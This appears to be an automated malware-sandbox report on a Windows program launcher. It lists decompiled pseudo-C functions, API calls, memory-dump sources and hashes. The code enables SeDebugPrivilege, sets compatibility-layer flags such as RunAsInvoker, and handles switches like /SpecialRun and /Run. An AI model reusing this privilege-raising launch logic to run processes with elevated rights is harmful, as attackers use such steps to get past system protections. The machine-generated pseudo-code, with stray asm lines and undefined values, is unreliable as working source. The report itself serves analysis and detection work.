                                                                                                                    • GetProcAddress.KERNEL32(00000000,LookupPrivilegeValueW), ref: 0040900C
                                                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 0040901A
                                                                                                                    • GetProcAddress.KERNEL32(00000000,AdjustTokenPrivileges), ref: 00409040
                                                                                                                    • AdjustTokenPrivileges.KERNELBASE(00000002,00000000,00000001,00000000,00000000,00000000), ref: 00409051
                                                                                                                    • GetLastError.KERNEL32(00000000,00000000,00000000), ref: 00409053
                                                                                                                    • FindCloseChangeNotification.KERNELBASE(00000000), ref: 0040905E
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000007.00000002.277375754.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000007.00000002.277368466.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277388528.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277400417.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277454544.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressProc$ErrorLast$AdjustChangeCloseCurrentFindLookupNotificationPrivilegePrivilegesProcessTokenValue
                                                                                                                    • String ID: AdjustTokenPrivileges$LookupPrivilegeValueW
                                                                                                                    • API String ID: 616250965-1253513912
                                                                                                                    • Opcode ID: b5b45514c93916933a35bd7cc4bbde3415ee7f14846a7c37f1b94fb4e6c9eb93
                                                                                                                    • Instruction ID: 03a5dc6c67e2a3af6dad2eaf9b7d3d3c38ee31464385454108c093b6d6cde588
                                                                                                                    • Opcode Fuzzy Hash: b5b45514c93916933a35bd7cc4bbde3415ee7f14846a7c37f1b94fb4e6c9eb93
                                                                                                                    • Instruction Fuzzy Hash: 34114F72500105FFEB10AFF4DD859AF76ADAB44384B10413AF541F2192DA789E449B68
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 004022D5, Relevance: 61.7, APIs: 25, Strings: 10, Instructions: 435COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 83%
                                                                                                                    			E004022D5(void* __ecx, void* __edx, void* __eflags, long _a4, long _a8) {
				WCHAR* _v8;
				signed int _v12;
				int _v16;
				int _v20;
				char* _v24;
				int _v28;
				intOrPtr _v32;
				int _v36;
				int _v40;
				char _v44;
				void* _v56;
				int _v60;
				char _v92;
				void _v122;
				int _v124;
				short _v148;
				signed int _v152;
				intOrPtr _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				void _v192;
				char _v196;
				char _v228;
				void _v258;
				int _v260;
				void _v786;
				short _v788;
				void _v1314;
				short _v1316;
				void _v1842;
				short _v1844;
				void _v18234;
				short _v18236;
				char _v83772;
				void* __ebx;
				void* __edi;
				void* __esi;
				short* _t174;
				short _t175;
				signed int _t176;
				short _t177;
				short _t178;
				int _t184;
				signed int _t187;
				intOrPtr _t207;
				intOrPtr _t219;
				int* _t252;
				int* _t253;
				int* _t266;
				int* _t267;
				wchar_t* _t270;
				int _t286;
				void* _t292;
				void* _t304;
				WCHAR* _t308;
				WCHAR* _t310;
				intOrPtr* _t311;
				int _t312;
				WCHAR* _t315;
				void* _t325;
				void* _t328;

				_t304 = __edx;
				E0040B550(0x1473c, __ecx);
				_t286 = 0;
				 *_a4 = 0;
				_v12 = 0;
				_v16 = 0;
				_v20 = 0;
				memset( &_v192, 0, 0x40);
				_v60 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v24 = 0;
				_v40 = 0;
				_v28 = 0;
				_v36 = 0;
				_v32 = 0x100;
				_v44 = 0;
				_v1316 = 0;
				memset( &_v1314, 0, 0x208);
				_v788 = 0;
				memset( &_v786, 0, 0x208);
				_t315 = _a8;
				_t328 = _t325 + 0x24;
				_v83772 = 0;
				_v196 = 0x44;
				E00404923(0x104,  &_v788, _t315);
				if(wcschr(_t315, 0x25) != 0) {
					ExpandEnvironmentStringsW(_t315,  &_v788, 0x104);
				}
				if(_t315[0x2668] != _t286 && wcschr( &_v788, 0x5c) == 0) {
					_v8 = _t286;
					_v1844 = _t286;
					memset( &_v1842, _t286, 0x208);
					_t328 = _t328 + 0xc;
					SearchPathW(_t286,  &_v788, _t286, 0x104,  &_v1844,  &_v8);
					if(_v1844 != _t286) {
						E00404923(0x104,  &_v788,  &_v1844);
					}
				}
				_t308 =  &(_t315[0x2106]);
				if( *_t308 == _t286) {
					E00404B5C( &_v1316,  &_v788);
					__eflags = _v1316 - _t286;
					_t315 = _a8;
					_pop(_t292);
					if(_v1316 == _t286) {
						goto L11;
					}
					goto L10;
				} else {
					_v20 = _t308;
					_t270 = wcschr(_t308, 0x25);
					_pop(_t292);
					if(_t270 == 0) {
						L11:
						_t174 =  &(_t315[0x220e]);
						if( *_t174 != 1) {
							_v152 = _v152 | 0x00000001;
							_v148 =  *_t174;
						}
						_t309 = ",";
						if(_t315[0x2210] != _t286 && _t315[0x2212] != _t286) {
							_v260 = _t286;
							memset( &_v258, _t286, 0x3e);
							_v124 = _t286;
							memset( &_v122, _t286, 0x3e);
							_v8 = _t286;
							E004052F3( &(_t315[0x2212]), _t292,  &_v260, 0x1f,  &_v8, ",");
							E004052F3( &(_t315[0x2212]), _t292,  &_v124, 0x1f,  &_v8, ",");
							_v152 = _v152 | 0x00000004;
							_t266 =  &_v260;
							_push(_t266);
							L0040B1F8();
							_v180 = _t266;
							_t328 = _t328 + 0x3c;
							_t267 =  &_v124;
							L0040B1F8();
							_t292 = _t267;
							_v176 = _t267;
						}
						if(_t315[0x2232] != _t286 && _t315[0x2234] != _t286) {
							_v260 = _t286;
							memset( &_v258, _t286, 0x3e);
							_v124 = _t286;
							memset( &_v122, _t286, 0x3e);
							_v8 = _t286;
							E004052F3( &(_t315[0x2234]), _t292,  &_v260, 0x1f,  &_v8, _t309);
							E004052F3( &(_t315[0x2234]), _t292,  &_v124, 0x1f,  &_v8, _t309);
							_v152 = _v152 | 0x00000002;
							_t252 =  &_v260;
							_push(_t252);
							L0040B1F8();
							_v172 = _t252;
							_t328 = _t328 + 0x3c;
							_t253 =  &_v124;
							_push(_t253);
							L0040B1F8();
							_v168 = _t253;
						}
						_t310 =  &(_t315[0x105]);
						if( *_t310 != _t286) {
							if(_t315[0x266a] == _t286 || wcschr(_t310, 0x25) == 0) {
								_push(_t310);
							} else {
								_v18236 = _t286;
								memset( &_v18234, _t286, 0x4000);
								_t328 = _t328 + 0xc;
								ExpandEnvironmentStringsW(_t310,  &_v18236, 0x2000);
								_push( &_v18236);
							}
							_push( &_v788);
							_push(L"\"%s\" %s");
							_push(0x7fff);
							_push( &_v83772);
							L0040B1EC();
							_v24 =  &_v83772;
						}
						_t175 = _t315[0x220c];
						if(_t175 != 0x20) {
							_v12 = _t175;
						}
						_t311 = _a4;
						if(_t315[0x2254] == 2) {
							E00401D1E(_t311, L"RunAsInvoker");
						}
						_t176 = _t315[0x265c];
						if(_t176 != _t286 && _t176 - 1 <= 0xc) {
							E00401D1E(_t311,  *((intOrPtr*)(0x40f2a0 + _t176 * 4)));
						}
						_t177 = _t315[0x265e];
						if(_t177 != 1) {
							__eflags = _t177 - 2;
							if(_t177 != 2) {
								goto L37;
							}
							_push(L"16BITCOLOR");
							goto L36;
						} else {
							_push(L"256COLOR");
							L36:
							E00401D1E(_t311);
							L37:
							if(_t315[0x2660] == _t286) {
								__eflags = _t315[0x2662] - _t286;
								if(_t315[0x2662] == _t286) {
									__eflags = _t315[0x2664] - _t286;
									if(_t315[0x2664] == _t286) {
										__eflags = _t315[0x2666] - _t286;
										if(_t315[0x2666] == _t286) {
											L46:
											_t178 = _t315[0x2a6e];
											_t358 = _t178 - 3;
											if(_t178 != 3) {
												__eflags = _t178 - 2;
												if(_t178 != 2) {
													__eflags =  *_t311 - _t286;
													if( *_t311 == _t286) {
														_push(_t286);
													} else {
														_push(_t311);
													}
													SetEnvironmentVariableW(L"__COMPAT_LAYER", ??);
													L63:
													_t293 = _t311;
													_t184 = E00401FE6(_t315, _t311, _t304,  &_v788, _v24, _v12, _v16, _v20,  &_v196,  &_v60); // executed
													_t312 = _t184;
													if(_t312 == _t286 && _v60 != _t286) {
														_t363 = _t315[0x266c] - _t286;
														if(_t315[0x266c] != _t286) {
															_t187 = E00401A3F(_t293, _t363,  &(_t315[0x266e]));
															_a4 = _a4 | 0xffffffff;
															_a8 = _t286;
															GetProcessAffinityMask(_v60,  &_a8,  &_a4);
															_t184 = SetProcessAffinityMask(_v60, _a4 & _t187);
														}
													}
													E004055D1(_t184,  &_v44);
													return _t312;
												}
												E00405497( &_v92);
												E00405497( &_v228);
												E0040149F(__eflags,  &_v92);
												E0040135C(E004055EC( &(_t315[0x2a70])), __eflags,  &_v228);
												E00401551( &_v228, _t304, __eflags,  &_v92);
												_t204 = _a4;
												__eflags =  *_a4;
												if(__eflags != 0) {
													E004014E9( &_v92, _t304, __eflags,  &_v92, _t204);
												}
												E00401421( &_v44, _t304,  &_v92, __eflags);
												_t207 = _v28;
												__eflags = _t207;
												_v16 = 0x40c4e8;
												if(_t207 != 0) {
													_v16 = _t207;
												}
												_v12 = _v12 | 0x00000400;
												E004054B9( &_v228);
												E004054B9( &_v92);
												_t286 = 0;
												__eflags = 0;
												L58:
												_t315 = _a8;
												_t311 = _a4;
												goto L63;
											}
											E00405497( &_v92);
											E0040135C(E004055EC( &(_t315[0x2a70])), _t358,  &_v92);
											_t359 =  *_t311 - _t286;
											if( *_t311 != _t286) {
												E004014E9( &_v92, _t304, _t359,  &_v92, _t311);
											}
											E00401421( &_v44, _t304,  &_v92, _t359);
											_t219 = _v28;
											_v16 = 0x40c4e8;
											if(_t219 != _t286) {
												_v16 = _t219;
											}
											_v12 = _v12 | 0x00000400;
											E004054B9( &_v92);
											goto L58;
										}
										_push(L"HIGHDPIAWARE");
										L45:
										E00401D1E(_t311);
										goto L46;
									}
									_push(L"DISABLEDWM");
									goto L45;
								}
								_push(L"DISABLETHEMES");
								goto L45;
							}
							_push(L"640X480");
							goto L45;
						}
					}
					ExpandEnvironmentStringsW(_t308,  &_v1316, 0x104);
					L10:
					_v20 =  &_v1316;
					goto L11;
				}
			}

































































                                                                                                                    0x004022d5
                                                                                                                    0x004022dd
                                                                                                                    0x004022e7
                                                                                                                    0x004022ec
                                                                                                                    0x004022f7
                                                                                                                    0x004022fa
                                                                                                                    0x004022fd
                                                                                                                    0x00402300
                                                                                                                    0x00402307
                                                                                                                    0x0040230d
                                                                                                                    0x0040230e
                                                                                                                    0x00402318
                                                                                                                    0x00402321
                                                                                                                    0x00402324
                                                                                                                    0x00402327
                                                                                                                    0x0040232a
                                                                                                                    0x0040232d
                                                                                                                    0x00402334
                                                                                                                    0x00402337
                                                                                                                    0x0040233e
                                                                                                                    0x0040234f
                                                                                                                    0x00402356
                                                                                                                    0x0040235b
                                                                                                                    0x0040235e
                                                                                                                    0x0040236d
                                                                                                                    0x00402374
                                                                                                                    0x0040237e
                                                                                                                    0x00402395
                                                                                                                    0x004023a0
                                                                                                                    0x004023a0
                                                                                                                    0x004023ac
                                                                                                                    0x004023cf
                                                                                                                    0x004023d2
                                                                                                                    0x004023d9
                                                                                                                    0x004023de
                                                                                                                    0x004023f6
                                                                                                                    0x00402403
                                                                                                                    0x00402414
                                                                                                                    0x00402419
                                                                                                                    0x00402403
                                                                                                                    0x0040241a
                                                                                                                    0x00402423
                                                                                                                    0x00402458
                                                                                                                    0x0040245d
                                                                                                                    0x00402464
                                                                                                                    0x00402467
                                                                                                                    0x00402468
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00402425
                                                                                                                    0x00402428
                                                                                                                    0x0040242b
                                                                                                                    0x00402433
                                                                                                                    0x00402434
                                                                                                                    0x00402473
                                                                                                                    0x00402473
                                                                                                                    0x0040247c
                                                                                                                    0x00402481
                                                                                                                    0x00402488
                                                                                                                    0x00402488
                                                                                                                    0x00402495
                                                                                                                    0x0040249a
                                                                                                                    0x004024b7
                                                                                                                    0x004024be
                                                                                                                    0x004024cd
                                                                                                                    0x004024d1
                                                                                                                    0x004024ed
                                                                                                                    0x004024f0
                                                                                                                    0x00402506
                                                                                                                    0x0040250b
                                                                                                                    0x00402512
                                                                                                                    0x00402518
                                                                                                                    0x00402519
                                                                                                                    0x0040251e
                                                                                                                    0x00402524
                                                                                                                    0x00402527
                                                                                                                    0x0040252b
                                                                                                                    0x00402530
                                                                                                                    0x00402531
                                                                                                                    0x00402531
                                                                                                                    0x0040253d
                                                                                                                    0x0040255a
                                                                                                                    0x00402561
                                                                                                                    0x00402570
                                                                                                                    0x00402574
                                                                                                                    0x00402590
                                                                                                                    0x00402593
                                                                                                                    0x004025a9
                                                                                                                    0x004025ae
                                                                                                                    0x004025b5
                                                                                                                    0x004025bb
                                                                                                                    0x004025bc
                                                                                                                    0x004025c1
                                                                                                                    0x004025c7
                                                                                                                    0x004025ca
                                                                                                                    0x004025cd
                                                                                                                    0x004025ce
                                                                                                                    0x004025d4
                                                                                                                    0x004025d4
                                                                                                                    0x004025da
                                                                                                                    0x004025e3
                                                                                                                    0x004025eb
                                                                                                                    0x00402633
                                                                                                                    0x004025fb
                                                                                                                    0x00402608
                                                                                                                    0x0040260f
                                                                                                                    0x00402614
                                                                                                                    0x00402624
                                                                                                                    0x00402630
                                                                                                                    0x00402630
                                                                                                                    0x0040263a
                                                                                                                    0x0040263b
                                                                                                                    0x00402646
                                                                                                                    0x0040264b
                                                                                                                    0x0040264c
                                                                                                                    0x0040265a
                                                                                                                    0x0040265a
                                                                                                                    0x0040265d
                                                                                                                    0x00402666
                                                                                                                    0x00402668
                                                                                                                    0x00402668
                                                                                                                    0x00402672
                                                                                                                    0x00402675
                                                                                                                    0x0040267e
                                                                                                                    0x0040267e
                                                                                                                    0x00402683
                                                                                                                    0x0040268b
                                                                                                                    0x0040269e
                                                                                                                    0x0040269e
                                                                                                                    0x004026a3
                                                                                                                    0x004026ac
                                                                                                                    0x004026b5
                                                                                                                    0x004026b8
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x004026ba
                                                                                                                    0x00000000
                                                                                                                    0x004026ae
                                                                                                                    0x004026ae
                                                                                                                    0x004026bf
                                                                                                                    0x004026c1
                                                                                                                    0x004026c6
                                                                                                                    0x004026cc
                                                                                                                    0x004026d5
                                                                                                                    0x004026db
                                                                                                                    0x004026e4
                                                                                                                    0x004026ea
                                                                                                                    0x004026f3
                                                                                                                    0x004026f9
                                                                                                                    0x00402707
                                                                                                                    0x00402707
                                                                                                                    0x0040270d
                                                                                                                    0x00402710
                                                                                                                    0x0040276d
                                                                                                                    0x00402770
                                                                                                                    0x0040280b
                                                                                                                    0x0040280e
                                                                                                                    0x00402813
                                                                                                                    0x00402810
                                                                                                                    0x00402810
                                                                                                                    0x00402810
                                                                                                                    0x00402819
                                                                                                                    0x0040281f
                                                                                                                    0x00402836
                                                                                                                    0x00402841
                                                                                                                    0x00402846
                                                                                                                    0x0040284a
                                                                                                                    0x00402851
                                                                                                                    0x00402857
                                                                                                                    0x00402860
                                                                                                                    0x00402865
                                                                                                                    0x00402876
                                                                                                                    0x00402879
                                                                                                                    0x00402888
                                                                                                                    0x00402888
                                                                                                                    0x00402857
                                                                                                                    0x00402891
                                                                                                                    0x0040289c
                                                                                                                    0x0040289c
                                                                                                                    0x00402779
                                                                                                                    0x00402784
                                                                                                                    0x0040278d
                                                                                                                    0x004027a4
                                                                                                                    0x004027b3
                                                                                                                    0x004027b8
                                                                                                                    0x004027bb
                                                                                                                    0x004027bf
                                                                                                                    0x004027c6
                                                                                                                    0x004027c6
                                                                                                                    0x004027d1
                                                                                                                    0x004027d6
                                                                                                                    0x004027d9
                                                                                                                    0x004027db
                                                                                                                    0x004027e2
                                                                                                                    0x004027e4
                                                                                                                    0x004027e4
                                                                                                                    0x004027e7
                                                                                                                    0x004027f4
                                                                                                                    0x004027fc
                                                                                                                    0x00402801
                                                                                                                    0x00402801
                                                                                                                    0x00402803
                                                                                                                    0x00402803
                                                                                                                    0x00402806
                                                                                                                    0x00000000
                                                                                                                    0x00402806
                                                                                                                    0x00402715
                                                                                                                    0x00402729
                                                                                                                    0x0040272e
                                                                                                                    0x00402731
                                                                                                                    0x00402738
                                                                                                                    0x00402738
                                                                                                                    0x00402743
                                                                                                                    0x00402748
                                                                                                                    0x0040274d
                                                                                                                    0x00402754
                                                                                                                    0x00402756
                                                                                                                    0x00402756
                                                                                                                    0x00402759
                                                                                                                    0x00402763
                                                                                                                    0x00000000
                                                                                                                    0x00402763
                                                                                                                    0x004026fb
                                                                                                                    0x00402700
                                                                                                                    0x00402702
                                                                                                                    0x00000000
                                                                                                                    0x00402702
                                                                                                                    0x004026ec
                                                                                                                    0x00000000
                                                                                                                    0x004026ec
                                                                                                                    0x004026dd
                                                                                                                    0x00000000
                                                                                                                    0x004026dd
                                                                                                                    0x004026ce
                                                                                                                    0x00000000
                                                                                                                    0x004026ce
                                                                                                                    0x004026ac
                                                                                                                    0x00402443
                                                                                                                    0x0040246a
                                                                                                                    0x00402470
                                                                                                                    0x00000000
                                                                                                                    0x00402470

                                                                                                                    APIs
                                                                                                                    • memset.MSVCRT ref: 00402300
                                                                                                                    • memset.MSVCRT ref: 0040233E
                                                                                                                    • memset.MSVCRT ref: 00402356
                                                                                                                      • Part of subcall function 00404923: wcslen.MSVCRT ref: 0040492A
                                                                                                                      • Part of subcall function 00404923: memcpy.MSVCRT ref: 00404940
                                                                                                                    • wcschr.MSVCRT ref: 00402387
                                                                                                                    • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 004023A0
                                                                                                                      • Part of subcall function 00404B5C: wcscpy.MSVCRT ref: 00404B61
                                                                                                                      • Part of subcall function 00404B5C: wcsrchr.MSVCRT ref: 00404B69
                                                                                                                    • wcschr.MSVCRT ref: 004023B7
                                                                                                                    • memset.MSVCRT ref: 004023D9
                                                                                                                    • SearchPathW.KERNEL32(00000000,?,00000000,00000104,?,?,?,?,?,?,?,?,?,?,00000208), ref: 004023F6
                                                                                                                    • wcschr.MSVCRT ref: 0040242B
                                                                                                                    • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 00402443
                                                                                                                    • memset.MSVCRT ref: 004024BE
                                                                                                                    • memset.MSVCRT ref: 004024D1
                                                                                                                    • _wtoi.MSVCRT ref: 00402519
                                                                                                                    • _wtoi.MSVCRT ref: 0040252B
                                                                                                                    • memset.MSVCRT ref: 00402561
                                                                                                                    • memset.MSVCRT ref: 00402574
                                                                                                                    • _wtoi.MSVCRT ref: 004025BC
                                                                                                                    • _wtoi.MSVCRT ref: 004025CE
                                                                                                                    • wcschr.MSVCRT ref: 004025F0
                                                                                                                    • memset.MSVCRT ref: 0040260F
                                                                                                                    • ExpandEnvironmentStringsW.KERNEL32(?,?,00002000,?,?,?,?,?,?,?,?,00000208), ref: 00402624
                                                                                                                    • _snwprintf.MSVCRT ref: 0040264C
                                                                                                                    • SetEnvironmentVariableW.KERNEL32(__COMPAT_LAYER,00000000), ref: 00402819
                                                                                                                    • GetProcessAffinityMask.KERNEL32(?,?,000000FF), ref: 00402879
                                                                                                                    • SetProcessAffinityMask.KERNEL32(?,000000FF), ref: 00402888
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000007.00000002.277375754.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000007.00000002.277368466.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277388528.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277400417.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277454544.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: memset$Environment_wtoiwcschr$ExpandStrings$AffinityMaskProcess$PathSearchVariable_snwprintfmemcpywcscpywcslenwcsrchr
                                                                                                                    • String ID: "%s" %s$16BITCOLOR$256COLOR$640X480$D$DISABLEDWM$DISABLETHEMES$HIGHDPIAWARE$RunAsInvoker$__COMPAT_LAYER
                                                                                                                    • API String ID: 2452314994-435178042
                                                                                                                    • Opcode ID: 067d403336562cb18e4ef95dc35e81972e5343f3ed9e099bed5cf17b41ec62b0
                                                                                                                    • Instruction ID: b54a7db1e05dda42e7bfc3830e2036fe484084dd7c1f23c6c807eede0ded9d8d
                                                                                                                    • Opcode Fuzzy Hash: 067d403336562cb18e4ef95dc35e81972e5343f3ed9e099bed5cf17b41ec62b0
                                                                                                                    • Instruction Fuzzy Hash: 03F14F72900218AADB20EFA5CD85ADEB7B8EF04304F1045BBE619B71D1D7789A84CF59
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00408533, Relevance: 40.5, APIs: 15, Strings: 8, Instructions: 259COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 89%
                                                                                                                    			E00408533(void* __ecx, void* __edx, void* __eflags, char _a8, intOrPtr _a12, char _a32, WCHAR* _a40, WCHAR* _a44, intOrPtr _a48, WCHAR* _a52, WCHAR* _a56, char _a60, int _a64, char* _a68, int _a72, char _a76, int _a80, char* _a84, int _a88, long _a92, void _a94, long _a620, void _a622, char _a1132, char _a1148, WCHAR* _a3196, WCHAR* _a3200, WCHAR* _a3204, WCHAR* _a3208, void* _a3212, char _a3216, int _a5264, int _a5268, int _a5272, int _a5276, int _a5280, char _a5288, char _a5292, int _a7340, int _a7344, int _a7348, int _a7352, int _a7356) {
				char _v0;
				WCHAR* _v4;
				void* __edi;
				void* __esi;
				void* _t76;
				void* _t82;
				wchar_t* _t85;
				void* _t86;
				void* _t87;
				intOrPtr _t92;
				wchar_t* _t93;
				intOrPtr _t95;
				int _t106;
				char* _t110;
				intOrPtr _t115;
				wchar_t* _t117;
				intOrPtr _t124;
				wchar_t* _t125;
				intOrPtr _t131;
				wchar_t* _t132;
				int _t154;
				int _t156;
				void* _t159;
				intOrPtr _t162;
				void* _t177;
				void* _t178;
				void* _t179;
				intOrPtr _t181;
				int _t187;
				intOrPtr _t188;
				intOrPtr _t190;
				intOrPtr _t198;
				signed int _t205;
				signed int _t206;

				_t179 = __edx;
				_t158 = __ecx;
				_t206 = _t205 & 0xfffffff8;
				E0040B550(0x1ccc, __ecx);
				_t76 = E0040313D(_t158);
				if(_t76 != 0) {
					E0040AC52();
					SetErrorMode(0x8001); // executed
					_t156 = 0;
					 *0x40fa70 = 0x11223344;
					EnumResourceTypesW(GetModuleHandleW(0), E0040A3C1, 0); // executed
					_t82 = E00405497( &_a8);
					_a48 = 0x20;
					_a40 = 0;
					_a52 = 0;
					_a44 = 0;
					_a56 = 0;
					E004056B5(_t158, __eflags, _t82, _a12); // executed
					E00408F48(_t158, __eflags, L"SeDebugPrivilege"); // executed
					 *_t206 = L"/SpecialRun";
					_t85 = E0040585C( &_v0);
					__eflags = _t85;
					if(_t85 != 0) {
						L8:
						_t86 = E0040585C( &_a8, L"/Run");
						__eflags = _t86 - _t156;
						if(_t86 < _t156) {
							_t87 = E0040585C( &_a8, L"/cfg");
							__eflags = _t87 - _t156;
							if(_t87 >= _t156) {
								_t162 =  *0x40fa74; // 0x4101c8
								_t41 = _t87 + 1; // 0x1
								ExpandEnvironmentStringsW(E0040584C( &_a8, _t41), _t162 + 0x5504, 0x104);
								_t115 =  *0x40fa74; // 0x4101c8
								_t117 = wcschr(_t115 + 0x5504, 0x5c);
								__eflags = _t117;
								if(_t117 == 0) {
									_a92 = _t156;
									memset( &_a94, _t156, 0x208);
									_a620 = _t156;
									memset( &_a622, _t156, 0x208);
									GetCurrentDirectoryW(0x104,  &_a92);
									_t124 =  *0x40fa74; // 0x4101c8
									_t125 = _t124 + 0x5504;
									_v4 = _t125;
									_t187 = wcslen(_t125);
									_t51 = wcslen( &_a92) + 1; // 0x1
									__eflags = _t187 + _t51 - 0x104;
									if(_t187 + _t51 >= 0x104) {
										_a620 = _t156;
									} else {
										E00404BE4( &_a620,  &_a92, _v4);
									}
									_t131 =  *0x40fa74; // 0x4101c8
									_t132 = _t131 + 0x5504;
									__eflags = _t132;
									wcscpy(_t132,  &_a620);
								}
							}
							E00402F31(_t156);
							_t181 =  *0x40fa74; // 0x4101c8
							_pop(_t159);
							_a84 =  &_a8;
							_a76 = 0x40cb0c;
							_a88 = _t156;
							_a80 = _t156;
							E0040177C( &_a76, _t181 + 0x10, __eflags, _t156);
							_t92 =  *0x40fa74; // 0x4101c8
							__eflags =  *((intOrPtr*)(_t92 + 0x5710)) - _t156;
							if( *((intOrPtr*)(_t92 + 0x5710)) == _t156) {
								_t93 = E0040585C( &_a8, L"/savelangfile");
								__eflags = _t93;
								if(_t93 < 0) {
									E00406420();
									__imp__CoInitialize(_t156);
									_t95 =  *0x40fa74; // 0x4101c8
									E00408910(_t95 + 0x10, _t159, 0x416f60);
									 *((intOrPtr*)( *0x4158e0 + 8))(_t156);
									_t198 =  *0x40fa74; // 0x4101c8
									E00408910(0x416f60, 0x4158e0, _t198 + 0x10);
									E00402F31(1);
									__imp__CoUninitialize();
								} else {
									E004065BE(_t159);
								}
								goto L7;
							} else {
								_t64 = _t92 + 0x10; // 0x4101d8
								_a7356 = _t156;
								_a7352 = _t156;
								_a7340 = _t156;
								_a7344 = _t156;
								_a7348 = _t156;
								_t156 = E00401D40(_t179, _t64,  &_a5292);
								_t110 =  &_a5288;
								L6:
								E004035FB(_t110);
								L7:
								E004054B9( &_v0);
								E004099D4( &_a32);
								E004054B9( &_v0);
								_t106 = _t156;
								goto L2;
							}
						}
						_t26 = _t86 + 1; // 0x1
						_t173 = _t26;
						__eflags =  *((intOrPtr*)(E0040584C( &_a8, _t26))) - _t156;
						if(__eflags == 0) {
							E00402F31(_t156);
						} else {
							E00402FC6(_t173, __eflags, _t138);
						}
						_t188 =  *0x40fa74; // 0x4101c8
						_a68 =  &_a8;
						_a60 = 0x40cb0c;
						_a72 = _t156;
						_a64 = _t156;
						E0040177C( &_a60, _t188 + 0x10, __eflags, _t156);
						_t190 =  *0x40fa74; // 0x4101c8
						_a5280 = _t156;
						_a5276 = _t156;
						_a5264 = _t156;
						_a5268 = _t156;
						_a5272 = _t156;
						_t156 = E00401D40(_t179, _t190 + 0x10,  &_a3216);
						_t110 =  &_a3212;
						goto L6;
					}
					__eflags = _a56 - 3;
					if(_a56 != 3) {
						goto L8;
					}
					__eflags = 1;
					_a3212 = 0;
					_a3208 = 0;
					_a3196 = 0;
					_a3200 = 0;
					_a3204 = 0;
					_v4 = 0;
					_v0 = 0;
					swscanf(E0040584C( &_v0, 1), L"%I64x",  &_v4);
					_t177 = 2;
					_push(E0040584C( &_v0, _t177));
					L0040B1F8();
					_pop(_t178);
					_t154 = E00401AC9(_t178, _t179, __eflags,  &_a1148, _v4, _v0, _t152); // executed
					_t156 = _t154;
					_t110 =  &_a1132;
					goto L6;
				} else {
					_t106 = _t76 + 1;
					L2:
					return _t106;
				}
			}





































                                                                                                                    0x00408533
                                                                                                                    0x00408533
                                                                                                                    0x00408536
                                                                                                                    0x0040853e
                                                                                                                    0x00408546
                                                                                                                    0x0040854d
                                                                                                                    0x00408559
                                                                                                                    0x00408563
                                                                                                                    0x00408569
                                                                                                                    0x00408572
                                                                                                                    0x00408583
                                                                                                                    0x0040858d
                                                                                                                    0x00408595
                                                                                                                    0x0040859e
                                                                                                                    0x004085a2
                                                                                                                    0x004085a6
                                                                                                                    0x004085aa
                                                                                                                    0x004085ae
                                                                                                                    0x004085b8
                                                                                                                    0x004085c1
                                                                                                                    0x004085c8
                                                                                                                    0x004085cd
                                                                                                                    0x004085cf
                                                                                                                    0x0040867f
                                                                                                                    0x00408688
                                                                                                                    0x0040868d
                                                                                                                    0x0040868f
                                                                                                                    0x00408730
                                                                                                                    0x00408735
                                                                                                                    0x00408737
                                                                                                                    0x0040873d
                                                                                                                    0x00408750
                                                                                                                    0x0040875d
                                                                                                                    0x00408763
                                                                                                                    0x00408770
                                                                                                                    0x00408775
                                                                                                                    0x00408779
                                                                                                                    0x0040878b
                                                                                                                    0x00408790
                                                                                                                    0x004087a2
                                                                                                                    0x004087aa
                                                                                                                    0x004087b8
                                                                                                                    0x004087be
                                                                                                                    0x004087c3
                                                                                                                    0x004087c9
                                                                                                                    0x004087d2
                                                                                                                    0x004087df
                                                                                                                    0x004087e3
                                                                                                                    0x004087e6
                                                                                                                    0x00408801
                                                                                                                    0x004087e8
                                                                                                                    0x004087f8
                                                                                                                    0x004087fe
                                                                                                                    0x00408811
                                                                                                                    0x00408816
                                                                                                                    0x00408816
                                                                                                                    0x0040881c
                                                                                                                    0x00408822
                                                                                                                    0x00408779
                                                                                                                    0x00408824
                                                                                                                    0x00408829
                                                                                                                    0x00408833
                                                                                                                    0x00408834
                                                                                                                    0x00408840
                                                                                                                    0x00408848
                                                                                                                    0x0040884c
                                                                                                                    0x00408850
                                                                                                                    0x00408855
                                                                                                                    0x0040885a
                                                                                                                    0x00408860
                                                                                                                    0x004088ac
                                                                                                                    0x004088b1
                                                                                                                    0x004088b3
                                                                                                                    0x004088bf
                                                                                                                    0x004088c5
                                                                                                                    0x004088cb
                                                                                                                    0x004088da
                                                                                                                    0x004088ea
                                                                                                                    0x004088ed
                                                                                                                    0x004088f8
                                                                                                                    0x004088ff
                                                                                                                    0x00408905
                                                                                                                    0x004088b5
                                                                                                                    0x004088b5
                                                                                                                    0x004088b5
                                                                                                                    0x00000000
                                                                                                                    0x00408862
                                                                                                                    0x00408862
